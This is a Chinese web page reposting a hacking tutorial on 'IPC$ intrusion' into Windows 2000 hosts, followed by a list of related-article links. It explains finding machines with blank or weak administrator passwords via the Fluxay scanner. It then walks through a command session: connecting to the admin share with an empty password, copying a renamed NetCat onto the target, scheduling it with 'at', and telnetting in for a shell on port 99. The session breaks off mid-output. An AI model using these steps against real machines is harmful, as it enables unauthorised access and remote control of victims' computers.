IPC$入侵2

来源：百度文库编辑：神马文学网时间：2024/04/29 01:29:28

IPC$入侵
　　IPC$入侵
　　IPC$是Windows的默认共享。其实，这个共享并没有什么漏洞。
　　我们可以用主机的管理员用户名和密码连接。
　　问题就出在管理员密码了。直至现在为止，世界上起码有20%的人，把主机密码设置为“空”或者“123”等简单密码。
　　我们要寻找这些主机十分简单。只需要一个程序就可以。
　　下面，我会把以前写的一篇IPC$入侵文章，进行小小的修改。
　　本次范例需要的系统及程序情况如下：
　　操作系统：Windows 2000
　　对方操作系统：Windows 2000
　　程序（一）：流光 IV 国际版（Fluxay Release IV Build 2914 International Edition For NT/2000/XP）
　　程序（二）：Srv.exe
　　程序（三）：Ntlm.exe
　　本机IP：127.0.0.1
　　测试IP：127.0.0.25
　　新程序介绍：
　　Srv.exe：实际上是NetCat，这里改名为Srv.exe。用于在主机建立一个端口为99的shell。
　　Ntlm.exe：是小榕写的一个程序，用于修改Windows 2000 Telnet Servery身份验证的方式。
　　关于扫描的方法，在流光的help目录有一个ipc.mht的文件。里面有使用说明。
　　假设，我们扫描了一台IPC$主机：127.0.0.25
　　用户名：davis
　　密码：空
　　“//”后是注解。
　　Microsoft Windows 2000 [Version 5.00.2195]
　　(C) 版权所有 1985-1998 Microsoft Corp.
　　D:>net use \127.0.0.25$ "" /user:"davis" //这是我用流光扫到的密码~~~我们就拿它开刀吧~！
　　命令成功完成。
　　D:>copy srv.exe \127.0.0.25$ //先复制srv.exe上去，在流光的Tools目录就有。
　　已复制 1 个文件。
　　D:>net time \127.0.0.25 //查查时间。
　　\127.0.0.25 的当前时间是 2001/1/17 上午 10:48
　　命令成功完成。
　　D:>at \\127.0.0.25 10:50 srv.exe //用at命令启动srv.exe吧~！（这里设置的时间要比主机时间快）先去论坛灌几篇帖子。
　　新加了一项作业，其作业 ID = 1
　　D:>net time \\127.0.0.25 //再查查够时间没有？！噢~~够了~
　　127.0.0.25 的当前时间是 2001/1/17 上午 10:51
　　命令成功完成。
　　D:>telnet 127.0.0.25 99 //我们telnet吧，注意端口是99哦~
　　Microsoft Windows 2000 [

IPC$入侵2 ipc$入侵 ipc$共享入侵 ipc$共享入侵 ipc$入侵与防范利用ipc$入侵的相关命令一份详尽的IPC$入侵资料一份详尽的IPC$入侵资料菜鸟学黑客 IPC$入侵计算机系统浅析各个网络端口的入侵附[135,IPC$入侵详解] IPC 怎样防止别人用ipc$和默认共享入侵-网络安全-系统安全-Windows-操作系统-网络学... Port Windows IPC apps to Linux, Part 2: Semap... 什么是ipc$ 入侵电脑就这么简单2 IPC和管道简介如何建立ipc$ Linux IPC 参数设定关于IPC$详解基于Snort的入侵检测系统（2）基于Snort的入侵检测系统（2）实战入侵邻居MM家的无线路由器2 文化入侵 Hadoop系列－IPC之代码实现